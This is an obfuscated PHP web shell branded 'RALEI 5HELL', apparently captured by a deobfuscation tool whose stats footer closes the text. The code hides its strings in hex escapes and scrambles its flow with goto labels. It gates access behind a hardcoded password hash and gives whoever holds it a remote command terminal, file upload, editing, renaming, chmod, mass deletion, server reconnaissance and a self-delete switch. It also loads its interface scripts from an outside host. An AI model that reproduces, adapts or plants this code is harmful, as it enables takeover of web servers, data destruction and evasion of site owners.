</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-cursor"></i> Curl:</span><?php  goto KNMNH; zzU8_: echo function_exists("\155\x79\x73\161\x6c\137\x76\x65\x72\163\x69\157\156") ? "\x3c\163\x70\x61\156\x20\143\x6c\x61\x73\x73\x3d\x22\164\x65\170\164\x2d\163\165\143\x63\x65\x73\x73\42\x3e\117\116\x3c\x2f\x73\x70\141\156\76" : "\74\163\160\x61\x6e\40\143\x6c\141\x73\163\x3d\x22\164\145\x78\164\55\144\141\x6e\x67\x65\162\42\x3e\117\x46\106\x3c\x2f\x73\160\141\156\76"; goto eo9oy; qwjLI: echo php_uname(); goto tWlkv; C2o3f: if (isset($_GET["\x65\x78"]) && $_GET["\x65\170"] == "\153\151\x6c\154\x5f\155\145") { unlink(__FILE__); die("\117\x4b"); } goto eZ1vu; Mrb2A: if (isset($_GET["\x65\x78"]) && $_GET["\x65\170"] == "\x6c\157\153\146\151\154") { if (isset($_POST["\x6c\x6f\153\x66\151\154"])) { } echo modalpost("\x4c\303\xb8\x63\153\40\106\x69\154\x65", "\111\x6e\x70\165\164\x20\x46\x69\x6c\145\40\x4e\141\155\x65", $modalClock, "\146\x61\55\x6c\x6f\143\153", '', true); echo "\74\x73\143\162\x69\x70\x74\x3e\12\x20\x20\x20\x20\167\151\156\x64\157\167\x2e\157\x6e\154\x6f\141\x64\40\x3d\x20\x66\x75\x6e\x63\x74\x69\157\156\50\x29\40\x7b\12\40\x20\x20\40\40\40\x76\141\x72\40\147\145\x74\115\157\144\x61\154\157\x6b\x20\x3d\x20\x64\x6f\x63\x75\155\145\x6e\164\56\x71\x75\x65\x72\171\123\145\154\x65\x63\x74\157\x72\50\x22\x5b\144\141\x74\141\x2d\142\x73\55\x74\141\162\147\x65\x74\75\47\x23\154\303\270\x63\x6b\146\x69\154\x65\47\135\x22\x29\x3b\xa\x20\x20\x20\40\40\40\x67\145\x74\x4d\x6f\144\141\x6c\157\x6b\56\141\144\x64\x45\166\x65\156\164\114\x69\x73\164\x65\x6e\145\162\50\42\143\x6c\151\x63\153\x22\x2c\40\x66\x75\x6e\143\164\151\157\156\50\145\x76\x65\x6e\x74\51\x20\x7b\12\40\x20\x20\40\40\40\x20\40\x65\x76\x65\156\x74\x2e\160\x72\145\x76\x65\156\x74\x44\145\146\141\165\x6c\x74\50\x29\73\xa\x20\40\40\x20\x20\x20\x7d\x29\73\xa\40\x20\40\40\40\40\147\x65\164\115\x6f\144\x61\154\x6f\x6b\56\x63\154\151\x63\x6b\x28\x29\x3b\xa\x20\x20\40\x20\x7d\xa\40\x20\x3c\x2f\163\x63\162\151\x70\x74\76"; } goto M2vPM; LfI7x: $getdir = isset($_GET["\147\145\x74\x64\x69\x72"]) && !empty($_GET["\x67\x65\x74\144\x69\x72"]) ? IS_WIN ? str_replace("\134", "\x2f", $_GET["\147\x65\164\x64\x69\x72"]) : $_GET["\x67\x65\x74\144\151\x72"] : (isset($_GET["\147\x65\164\x66\151\154\x65"]) ? dirname($_GET["\x67\x65\x74\x66\x69\154\145"]) : getcwd()); goto Fxsb6; Gwr5s: session_start(); goto Y7joY; Zbqxa: $modalUpload = "\x3c\146\x6f\x72\x6d\40\x61\x63\x74\x69\x6f\x6e\x3d\42\77\147\145\x74\x64\x69\x72\75" . $getdir . "\x26\145\170\75\165\x70\x6c\x6f\141\144\x22\40\x6d\x65\164\150\x6f\x64\75\x22\x70\157\163\164\42\40\x65\x6e\143\164\x79\x70\145\x3d\42\155\165\154\x74\151\160\x61\162\x74\x2f\146\x6f\x72\x6d\55\144\141\164\141\42\x3e" . "\74\x64\151\x76\x20\x63\154\x61\x73\163\75\42\155\x62\x2d\64\42\76" . "\74\154\x61\x62\x65\154\40\x66\157\162\x3d\x22\146\x69\154\145\55\151\156\x70\165\x74\x22\x20\x63\154\x61\x73\163\75\42\x66\x6f\x72\x6d\x2d\154\x61\142\145\x6c\42\76\123\145\154\x65\143\x74\x20\x46\151\154\145\x3c\57\x6c\x61\x62\145\154\76" . "\x3c\x69\156\160\165\x74\x20\164\x79\160\145\75\x22\x66\x69\x6c\145\42\x20\143\154\x61\163\x73\x3d\42\x66\157\162\x6d\55\143\157\156\x74\x72\157\x6c\42\40\156\x61\155\x65\75\42\165\160\146\151\154\145\x22\x20\151\144\75\x22\x66\x69\154\x65\55\x69\x6e\x70\x75\164\x22\x20\x72\145\x71\x75\151\162\x65\144\x3e" . "\x3c\57\x64\151\x76\x3e" . "\x3c\x64\151\x76\x20\143\154\141\x73\163\75\42\x68\163\164\x61\x63\x6b\40\x67\x61\x70\55\x32\40\152\165\x73\x74\x69\146\171\55\143\157\156\164\x65\156\164\55\145\x6e\x64\x22\76" . "\x3c\x62\x75\164\x74\157\156\x20\x74\171\x70\x65\75\x22\142\x75\x74\x74\x6f\156\42\x20\x63\x6c\141\x73\163\75\42\x62\164\x6e\40\x62\x74\x6e\55\x6f\165\164\154\x69\156\145\x2d\x64\x61\x6e\147\145\162\42\x20\144\141\x74\x61\55\x62\x73\x2d\x64\x69\x73\155\x69\163\163\x3d\x22\155\x6f\144\x61\154\42\x3e\x43\154\157\163\145\x3c\57\x62\165\164\164\157\156\76" . "\x3c\142\165\x74\164\157\156\x20\164\171\x70\145\75\42\x73\165\142\155\151\x74\x22\x20\143\x6c\x61\163\x73\75\x22\x62\164\x6e\40\x62\164\x6e\55\x70\x72\x69\x6d\141\x72\171\x22\x20\156\141\155\145\75\x22\x73\165\x62\x6d\151\164\137\x66\x69\x6c\145\42\x20\151\x64\x3d\42\165\x70\x6c\x6f\x61\x64\x46\151\154\x65\x22\76\x55\160\x6c\157\141\144\x3c\x2f\142\165\164\x74\157\x6e\x3e" . "\x3c\57\144\x69\166\76" . "\74\57\x66\x6f\x72\x6d\76"; goto OvkMa; DPQLU: ?>
</div><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-hdd-stack"></i> Your IP:</span> <span class="text-success"><?php  goto TNQio; VKQfC: @mb_internal_encoding("\x55\124\x46\55\70"); goto j84KU; AZ5Qx: if (isset($_GET["\x65\x78"]) && $_GET["\145\170"] == "\164\x65\162\x6d\x69\156\141\154") { echo modalpost("\103\x6f\155\x6d\x61\x6e\x64\x20\x35\x68\145\x6c\154", "\111\x6e\160\x75\164\x20\103\157\155\x6d\141\x6e\144", $modalCmd, "\146\141\x2d\x72\145\x63\x74\141\156\x67\154\x65\55\164\x65\162\155\151\156\x61\154", '', true, true); echo "\74\163\143\162\151\160\x74\x3e\12\40\40\x20\x20\167\151\x6e\144\x6f\x77\x2e\x6f\156\x6c\x6f\x61\144\40\x3d\40\146\165\156\143\164\151\x6f\x6e\x28\51\x20\x7b\xa\40\40\x20\x20\x20\x20\166\x61\162\x20\147\x65\x74\x4d\157\144\141\154\x43\155\144\x20\75\40\144\157\x63\165\155\x65\x6e\x74\56\161\x75\x65\162\x79\123\145\154\145\x63\x74\157\x72\50\42\x5b\x64\x61\164\141\55\142\163\x2d\x74\x61\162\x67\145\164\x3d\47\x23\x63\157\x6d\155\141\156\144\x35\x68\145\x6c\154\x27\135\x22\51\73\12\40\40\40\40\x20\x20\x67\145\x74\x4d\157\x64\141\154\103\155\144\x2e\x61\144\x64\105\x76\x65\x6e\x74\x4c\x69\163\164\x65\x6e\145\x72\x28\x22\143\x6c\x69\143\x6b\42\54\x20\146\165\x6e\x63\164\x69\157\156\x28\x65\166\145\156\x74\x29\40\173\xa\40\x20\40\x20\x20\x20\40\x20\145\x76\x65\x6e\164\56\x70\162\x65\166\145\156\164\104\x65\x66\x61\165\x6c\x74\x28\x29\x3b\xa\x20\40\40\40\x20\40\175\51\73\12\x20\x20\x20\40\40\40\147\145\164\x4d\157\x64\141\154\x43\155\144\56\x63\154\x69\143\153\50\x29\x3b\xa\40\x20\40\40\x7d\12\40\x20\74\x2f\163\143\162\151\x70\x74\x3e"; } goto pZLfW; Zxvrr: echo getUserGroupInfo(); goto DPQLU; VRGnu: ?>
</span></div></div><div class="row"><div class="col-12 d-flex justify-content-between"><a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="Kerang"data-bs-toggle2="tooltip"href="?getdir=<?php  goto fgSyv; q9Zuh: if (isset($_POST["\x6d\x61\x73\163\x61\143\164"])) { if (isset($_POST["\143\145\153\142\x6f\x78"])) { $maction = $_POST["\x6d\x61\143\x74\151\157\156"]; $cekbox = $_POST["\x63\145\x6b\142\157\x78"]; foreach ($cekbox as $cek) { if ($maction == "\150\x61\160\x75\163") { if (is_dir($cek)) { if (rrmdir($cek)) { displayAlert("\x53\x75\143\143\x65\163\x73\40\104\145\154\145\x74\x65\144\40\x44\x69\162\72\x20\74\142\x3e" . basename($cek) . "\x3c\x2f\142\x3e", "\x73\x75\143\143\x65\x73\163"); } else { displayAlert("\106\x61\151\154\145\144\40\124\x6f\x20\104\x65\x6c\145\x74\145\144\x20\x44\151\x72\x3a\x20\74\x62\x3e" . basename($cek) . "\74\x2f\142\x3e", "\x64\141\156\x67\x65\x72"); } } else { if (unlink($cek)) { displayAlert("\123\165\x63\x63\x65\163\x73\40\x44\x65\x6c\x65\x74\x65\144\40\x46\151\x6c\145\72\x20\x3c\x62\x3e" . basename($cek) . "\x3c\57\x62\76", "\x73\165\143\143\145\x73\163"); } else { displayAlert("\x46\141\151\154\145\144\x20\124\157\x20\104\x65\154\x65\164\x65\x64\40\x46\x69\154\145\x3a\x20\x3c\x62\76" . basename($cek) . "\x3c\x2f\x62\x3e", "\x64\x61\156\147\x65\162"); } } } elseif ($maction == "\143\x65\155\x6f\144\x65") { $chmod = intval($_POST["\x63\145\155\157\x64"], 8); if (is_dir($cek)) { if (chmod($cek, $chmod)) { displayAlert("\x53\165\143\x63\x65\x73\163\x20\143\150\141\x6e\147\x65\144\40\155\x6f\x64\145\x20\146\157\162\x20\x64\151\x72\x65\143\x74\157\x72\x79\x3a\40\x3c\x62\x3e" . basename($cek) . "\74\x2f\x62\76", "\x73\165\143\x63\145\163\x73"); } else { displayAlert("\x46\141\x69\154\145\x64\40\164\157\x20\x63\150\141\x6e\147\x65\40\x6d\157\x64\x65\x20\x66\157\162\x20\x64\151\162\x65\143\x74\157\162\171\72\40\x3c\142\76" . basename($cek) . "\x3c\x2f\142\x3e", "\x64\141\x6e\x67\145\x72"); } } elseif (is_file($cek)) { if (chmod($cek, $chmod)) { displayAlert("\x53\x75\x63\x63\x65\163\x73\40\143\x68\x61\x6e\x67\x65\144\x20\155\x6f\x64\145\40\146\x6f\x72\40\146\x69\x6c\x65\x3a\40\x3c\142\x3e" . basename($cek) . "\74\57\142\76", "\x73\165\143\x63\x65\x73\163"); } else { displayAlert("\x46\141\x69\154\145\144\40\x74\x6f\40\x63\x68\x61\x6e\x67\x65\x20\155\x6f\x64\145\40\146\157\x72\40\x66\151\154\145\x3a\x20\74\x62\76" . basename($cek) . "\74\x2f\142\76", "\x64\141\x6e\147\145\x72"); } } } } } } goto wB8Oc; tTGul: error_reporting(0); goto VKQfC; R8Gse: ?>
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-database"></i> Mysql:</span><?php  goto zzU8_; mubNe: function termnotasi() { if (IS_WIN) { $u = getenv("\x55\x53\105\122\116\x41\115\x45"); $h = getenv("\x43\117\115\x50\x55\x54\x45\x52\116\x41\x4d\105"); } else { $u = posix_getpwuid(posix_geteuid())["\156\x61\155\145"]; $h = gethostname(); } return "{$u}\100{$h}\x3a\40\x7e\x20\x24\40"; } goto GljT3; KmulI: ?>
"><?php  goto mwAc1; cmASg: ?>
</title><link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css"rel="stylesheet"crossorigin="anonymous"integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD"><link href="https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css"rel="stylesheet"><link href="https://fonts.googleapis.com/css2?family=Exo+2:wght@600&display=swap"rel="stylesheet"><link href="https://rhmansh.github.io/RALEI-SHELL/assets/css/main.css"rel="stylesheet"><link href="https://rhmansh.github.io/RALEI-SHELL/assets/css/icon.css"rel="stylesheet"><script src="https://unpkg.com/@popperjs/core@2"></script><script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"crossorigin="anonymous"integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script><script src="https://rhmansh.github.io/RALEI-SHELL/assets/js/app.js"></script></head><body><div class="preloader"><div class="loder"></div></div><style></style><div class="container-fluid zoom-in"><div class="row py-4"><div class="col-12 d-flex justify-content-center"><h1 class="fw-bold"><div class="judul mb-3"></div><div class="text-center fs-6 itsme"></div></h1></div></div><div class="row mb-2"><div class="col-12"><div class="border-light card border"><div class="card-body"><div class="text-center card-title text-warning">[!] This is Beta Version [!]</div><div class="row mb-2"><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-terminal"></i> Un4me:</span> <span class="text-success"><?php  goto qwjLI; TNQio: echo "{$_SERVER["\x52\x45\x4d\x4f\x54\105\137\101\104\104\122"]}"; goto i0xkR; eZ1vu: function login_ralei() { echo leijson()["\154\x6f\x67\151\x6e\x31"]; die; } goto wFaVC; j4A33: function isWritable($path) { if (is_dir($path)) { return is_writable($path); } else { return is_writable(dirname($path)); } } goto Nqyb1; wB8Oc: if (isset($_POST["\162\x65\x6e\141\x6d\145"])) { $new_name = $_POST["\x6e\145\167\137\x6e\x61\x6d\145"]; $renamed = rename($getfile, dirname($getfile) . "\x2f" . $new_name); if ($renamed) { displayAlert("\106\151\x6c\145\57\x44\x69\x72\x65\143\164\157\x72\x79\40\150\x61\163\40\x62\x65\x65\156\40\162\145\156\141\x6d\x65\144\x2c\x20\171\x61\163\x73\x73\41", "\x73\165\x63\x63\145\163\x73"); } else { displayAlert("\x46\141\151\154\145\144\40\164\x6f\x20\x72\145\156\x61\x6d\145\144\x20\x46\151\154\x65\57\x44\151\162\145\x63\x74\157\162\x79\x21", "\x64\141\x6e\147\145\162"); } } goto lEKGy; c11Ug: echo "{$_SERVER["\123\105\122\126\x45\x52\x5f\116\101\115\105"]}"; goto eD2Ck; JIcP4: echo "\x3c\57\x64\x69\x76\x3e\xa\40\40\x20\74\41\55\55\40\x65\156\x64\x20\143\157\156\x74\141\x69\x6e\145\162\40\x2d\x2d\76\xa\74\x64\151\166\x20\143\154\x61\x73\163\75\42\143\157\156\164\141\x69\x6e\145\162\55\146\x6c\165\x69\x64\x22\x3e\xa\40\x20\74\x66\157\x6f\164\x65\162\40\143\x6c\141\163\x73\x3d\42\164\145\x78\x74\55\x6c\151\147\x68\x74\40\x70\x79\x2d\x33\42\x3e\xa\x20\x20\x20\40\x3c\144\151\166\x20\x63\154\141\x73\x73\x3d\42\162\x6f\x77\42\x3e\xa\40\40\40\x20\40\40\74\144\x69\166\40\x63\x6c\x61\x73\x73\75\42\x63\157\x6c\x2d\x31\62\42\76\xa\x20\40\40\x20\40\x20\x20\40\74\x70\40\143\154\x61\x73\163\75\x22\x6d\x79\x74\x65\x61\x6d\40\164\145\170\164\55\144\x65\143\x6f\162\141\x74\x69\157\156\55\x75\156\x64\145\162\x6c\151\x6e\145\40\x74\x65\x78\164\55\x63\x65\156\x74\145\x72\42\76\74\x2f\x70\x3e\12\x20\x20\40\40\x20\40\x3c\x2f\144\x69\x76\x3e\12\x20\40\x20\40\74\57\144\x69\x76\76\12\74\57\146\157\157\164\145\x72\76\12\x20\x20\40\40\74\x2f\x64\x69\x76\x3e\xa\x3c\x73\x63\162\x69\160\164\40\163\x72\143\x3d\42\x68\x74\x74\x70\163\72\x2f\57\162\150\155\x61\156\x73\150\x2e\147\151\x74\x68\165\142\56\151\157\57\122\x41\x4c\105\111\x2d\123\110\105\x4c\114\57\141\x73\163\x65\164\x73\57\x6a\163\57\155\141\x69\156\x2e\152\x73\x22\76\x3c\57\x73\143\162\x69\x70\x74\x3e\40\x20\40\x20\12\74\57\142\x6f\x64\x79\x3e\12\74\x2f\150\164\x6d\154\76"; goto utTWY; MSit5: if (isset($_GET["\x65\170"]) && $_GET["\145\x78"] == "\x72\145\x74\x6d\x69") { echo leijson()["\162\145\x61\144\x6d\x65"]; } goto xFpoT; YUX2m: function rrmdir($dir) { if (!is_dir($dir)) { throw new Exception("{$dir}\40\x69\163\40\156\x6f\164\40\141\40\144\151\162\145\143\x74\x6f\x72\x79\x2e"); } $objects = scandir($dir); if ($objects === false) { throw new Exception("\x46\x61\x69\x6c\x65\144\40\164\x6f\x20\162\x65\x61\144\40\144\x69\x72\x65\x63\164\x6f\x72\x79\40{$dir}\56"); } foreach ($objects as $object) { if ($object != "\56" && $object != "\x2e\x2e") { $path = $dir . "\x2f" . $object; if (is_dir($path)) { if (!rrmdir($path)) { return false; } } else { if (!unlink($path)) { return false; } } } } if (!reset($objects)) { return false; } if (!rmdir($dir)) { return false; } clearstatcache(true, $dir); if (is_dir($dir)) { return false; } return true; } goto mubNe; SlGUD: if (!isset($_SESSION["\x6d\x61\x73\x75\x6b"]) || $_SESSION["\155\141\163\165\x6b"] != $auth_pass) { login_ralei(); } goto W6n8o; iadoK: echo function_exists("\160\145\162\154") ? "\x3c\163\160\141\x6e\x20\143\x6c\141\163\163\75\42\164\145\x78\164\x2d\163\165\x63\143\145\163\x73\42\76\117\116\x3c\x2f\x73\x70\x61\x6e\x3e" : "\x3c\163\160\141\156\40\143\154\x61\163\x73\75\42\164\x65\170\x74\x2d\x64\x61\156\147\x65\x72\x22\x3e\117\x46\106\74\x2f\163\160\x61\156\76"; goto IBFMi; fg2Cp: echo isWritable(isset($getfile) ? $getfile : $getdir) ? span("\x5b\40\x57\x72\x69\x74\x61\x62\x6c\x65\x20\x5d\40\x2d\x20", "\163\x75\x63\143\x65\x73\x73") . "\x3c\163\160\x61\x6e\x20\x63\154\x61\x73\x73\x3d\x22\x74\x65\x78\164\55\x73\165\143\x63\145\x73\x73\x22\x3e" . cekPerm(isset($getfile) ? $getfile : $getdir) . "\x3c\57\163\x70\x61\x6e\x3e" : span("\133\40\116\157\164\x20\127\162\x69\x74\x61\x62\154\145\x20\x5d\x20\x2d\40", "\144\x61\156\x67\145\162") . "\74\163\160\141\x6e\40\143\154\x61\x73\x73\x3d\42\164\145\x78\x74\x2d\144\141\156\147\x65\162\42\x3e" . cekPerm(isset($getfile) ? $getfile : $getdir) . "\x3c\x2f\x73\x70\x61\x6e\76"; goto LfSDA; S9YqN: echo isset($getfile) ? get_tree_path($getfile) : get_tree_path($getdir); goto V8syj; flT2x: echo "\77\x67\145\164\144\151\x72\x3d" . $getdir . "\x26\x65\170\x3d\163\145\141\162\x63\x68"; goto SOZKH; lh6vq: echo IS_WIN ? "\x3c\163\x70\141\x6e\40\143\x6c\x61\x73\x73\x3d\x22\x74\145\170\164\55\x73\x75\x63\143\x65\x73\163\x22\x3e\127\x69\x6e\144\157\x77\x73\x3c\57\163\160\141\156\76" : "\74\163\x70\x61\156\40\143\154\141\163\x73\75\42\164\x65\170\x74\x2d\x73\x75\x63\x63\145\x73\x73\42\76\x55\156\x69\170\x3c\x2f\163\160\141\x6e\x3e"; goto yMi02; qdLwq: echo @$_SERVER["\x53\105\122\x56\105\122\137\x41\x44\x44\x52"]; goto cmASg; jYFEI: echo extension_loaded("\x70\150\x70\x5f\x72\165\x62\x79") ? "\74\163\x70\141\156\x20\143\x6c\141\x73\163\75\x22\x74\145\170\164\x2d\163\x75\x63\143\x65\163\163\42\76\117\x4e\x3c\57\163\x70\141\156\76" : "\74\163\160\x61\156\x20\143\154\x61\163\163\x3d\42\164\x65\x78\164\x2d\144\141\156\x67\x65\x72\x22\76\x4f\106\x46\74\x2f\x73\x70\x61\156\x3e"; goto lu_RQ; JGZ79: if (isset($_POST["\x73\141\x76\x65\x5f\x66\151\x6c\x65"])) { $isifile = $_POST["\x69\x73\x69\146\x69\154\145"]; $file_path = $getfile; function svwrite($fn, $c) { $f = fopen($fn, "\x77"); if ($f) { fwrite($f, $c); fclose($f); return true; } else { return false; } } function svfpc($fn, $c) { if (file_put_contents($fn, $c) !== false) { return true; } else { return false; } } if (svwrite($file_path, $isifile)) { displayAlert("\125\x70\x64\x61\x74\x65\40\106\x69\154\145\x20\117\x4b\41", "\163\x75\143\x63\x65\x73\163"); } else { $errsv = error_get_last(); if ($errsv !== null) { $errorMessage = $errsv["\155\x65\x73\163\x61\147\145"]; displayAlert("\125\x70\144\141\x74\x65\40\106\151\x6c\145\x20\x46\x41\111\114\x45\x44\x21\40\x45\162\x72\x6f\x72\x3a\x20{$errorMessage}", "\144\x61\156\x67\x65\x72"); } else { if (svfpc($file_path, $isifile)) { displayAlert("\125\160\144\x61\x74\x65\40\x46\x69\154\x65\40\x4f\113\41", "\x73\165\143\143\x65\163\163"); } else { displayAlert("\125\160\x64\x61\x74\x65\x20\106\x69\x6c\x65\40\106\x41\x49\x4c\x45\x44\x21", "\144\x61\x6e\147\x65\x72"); } } } } goto MSit5; KdUFm: ?>
<span class="text-<?php  goto kocnX; EOEix: ?>
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-php"></i> PHP version:</span> <span class="text-success"><?php  goto AkcPy; Od1fM: echo "\46\43\71\x37\x33\60\73\40\173\x20\122\101\114\x45\111\40\65\x48\x45\x4c\114\40\175"; goto NLzar; eo9oy: ?>
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-cloud"></i> Web Server:</span> <span class="text-success"><?php  goto EGi9S; GVhMk: ?>
</span></div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-globe"></i> Domain:</span> <span class="text-success"><?php  goto c11Ug; H6Tp2: $auth_pass = "93f47598a626a203ce65b0e587d889a0"; goto Hs_m8; PpmRX: if (isset($_GET["\145\x78"]) && $_GET["\145\170"] == "\163\145\141\x72\x63\x68") { function sercing($dir, $searchQuery) { $res = ''; $files = scandir($dir); foreach ($files as $file) { if ($file === "\x2e" || $file === "\56\x2e") { continue; } $path = $dir . "\x2f" . $file; if (is_dir($path)) { $res .= sercing($path, $searchQuery); } else { if (strpos($file, $searchQuery) !== false) { $res .= $path . "\134\x6e"; } } } return $res; } echo modalpost("\123\145\141\x72\x63\150\40\106\x69\x6c\x65\40\57\40\x44\151\162", "\x53\145\x61\x72\143\x68\56\56\56", $modalCsearch, "\x66\141\55\163\145\141\162\143\150", '', true, true); echo "\74\x73\x63\162\x69\160\164\76\xa\40\40\x20\40\40\x20\40\x20\x20\x77\x69\156\144\x6f\x77\56\157\x6e\154\157\141\144\x20\75\x20\146\165\x6e\x63\164\x69\x6f\156\x28\51\40\173\xa\x20\40\x76\x61\162\40\x67\x65\164\x4d\x6f\x64\141\154\x53\x65\x72\x20\75\40\144\157\x63\x75\x6d\x65\x6e\164\56\x71\165\x65\162\171\123\x65\154\145\x63\x74\x6f\162\x28\x22\133\x64\x61\164\x61\x2d\x62\163\55\164\x61\162\x67\145\164\75\47\43\x73\145\x61\x72\x63\150\146\x69\154\x65\57\x64\151\162\47\135\x22\x29\73\xa\x20\x20\x67\145\164\x4d\157\x64\141\154\x53\x65\x72\x2e\x61\144\x64\x45\x76\145\x6e\164\x4c\x69\163\x74\x65\156\x65\162\50\x22\143\x6c\x69\143\x6b\x22\x2c\x20\146\165\156\x63\x74\x69\x6f\156\x28\145\166\x65\x6e\164\x29\40\x7b\12\x20\x20\40\40\x65\x76\x65\x6e\x74\x2e\x70\x72\145\166\145\156\x74\x44\x65\146\141\x75\154\x74\50\x29\73\xa\x20\x20\175\51\73\12\x20\x20\x67\x65\164\115\x6f\144\x61\154\x53\145\162\x2e\x63\x6c\151\143\153\x28\51\x3b\12\175\x20\12\74\57\163\x63\x72\151\x70\x74\x3e"; if (isset($_POST["\x73\145\162\143\151\156\147"])) { $serquery = $_POST["\x73\x65\x72\143\x69\x6e\x67"]; $seroutput = sercing(dirname($_SERVER["\104\x4f\103\125\115\105\x4e\124\137\122\117\117\x54"]), $serquery); echo "\x3c\x73\143\162\151\160\164\76\x64\x6f\x63\x75\x6d\x65\x6e\x74\56\x67\x65\x74\x45\154\x65\x6d\x65\x6e\164\102\x79\111\x64\50\x22\x73\145\x72\x6f\165\x74\x70\165\x74\42\x29\x2e\x76\141\x6c\165\145\x20\75\40" . json_encode($seroutput) . "\73\x3c\57\163\143\162\151\160\164\76"; } } goto AZ5Qx; C0BHX: $modalCfolder = "\74\x66\157\x72\155\40\155\145\x74\150\x6f\x64\x3d\42\160\157\163\164\x22\x3e" . "\74\x64\x69\x76\40\x63\154\141\x73\163\x3d\42\155\x62\55\64\42\76" . "\74\154\141\x62\x65\154\x20\x66\157\x72\75\42\146\157\154\x64\x65\x72\156\141\155\145\55\151\156\x70\165\164\x22\x20\143\154\x61\x73\x73\x3d\42\x66\x6f\162\x6d\x2d\154\141\142\x65\x6c\42\76\106\x6f\x6c\144\145\x72\40\116\x61\155\x65\74\57\x6c\141\142\x65\x6c\x3e" . "\74\151\x6e\x70\165\x74\40\x74\x79\x70\x65\x3d\42\x74\145\170\x74\x22\40\x63\x6c\141\x73\163\75\42\146\157\x72\x6d\x2d\x63\157\x6e\164\x72\157\x6c\42\x20\x6e\x61\155\145\x3d\x22\146\157\x6c\x64\145\x72\137\156\x61\155\145\x22\x20\151\144\x3d\42\x66\157\154\144\145\162\156\141\x6d\145\55\151\x6e\x70\x75\x74\42\40\162\145\161\x75\151\x72\x65\144\40\160\x6c\141\143\145\x68\x6f\x6c\144\145\162\75\42\x45\156\164\x65\x72\40\146\157\x6c\x64\145\x72\40\156\x61\x6d\x65\x22\76" . "\74\57\x64\151\x76\76" . "\x3c\x64\x69\166\40\143\154\x61\x73\163\75\42\x68\x73\x74\141\x63\x6b\40\147\x61\x70\x2d\62\x20\x6a\165\x73\164\x69\146\171\x2d\143\x6f\156\x74\145\156\x74\55\x65\156\144\x22\x3e" . "\x3c\142\x75\x74\x74\x6f\156\x20\164\x79\160\145\x3d\42\142\165\x74\164\x6f\156\x22\x20\143\154\141\163\x73\x3d\x22\142\x74\156\40\x62\x74\156\55\157\165\164\154\151\x6e\x65\55\x64\141\x6e\147\145\x72\x22\40\144\141\x74\x61\x2d\x62\x73\55\144\x69\x73\x6d\151\163\163\x3d\42\155\157\144\x61\x6c\42\76\103\x6c\157\163\145\x3c\57\142\165\x74\x74\x6f\156\x3e" . "\74\x62\165\164\164\157\156\x20\164\171\x70\145\75\x22\163\165\142\x6d\x69\x74\x22\x20\x63\154\x61\x73\x73\75\x22\x62\164\156\40\142\164\x6e\55\160\162\x69\155\x61\x72\171\x22\40\x6e\141\155\x65\75\x22\x63\162\145\141\x74\145\137\146\x6f\x6c\144\145\162\42\40\151\x64\x3d\x22\x61\144\144\116\x65\167\106\x6f\x6c\144\145\x72\x22\40\144\x61\164\x61\x2d\142\163\x2d\x74\157\147\x67\154\145\x3d\42\x74\x6f\x6f\x6c\x74\151\x70\x22\40\x64\x61\x74\141\x2d\142\x73\x2d\160\154\141\x63\145\x6d\145\156\x74\75\42\164\x6f\160\42\x20\x64\141\164\x61\55\x62\x73\x2d\x74\151\x74\154\x65\x3d\42\x43\x72\x65\x61\164\145\x20\x46\157\x6c\x64\x65\162\x22\76\x43\162\145\x61\x74\x65\74\57\x62\165\164\164\x6f\156\76" . "\74\57\144\151\166\x3e" . "\x3c\x2f\x66\x6f\162\155\x3e"; goto bPZB4; utTWY: ?>

Function Calls

None

Variables

None

Stats

MD5 2de2ae504b77731c0af5068c75d432f5
Eval Count 0
Decode Time 117 ms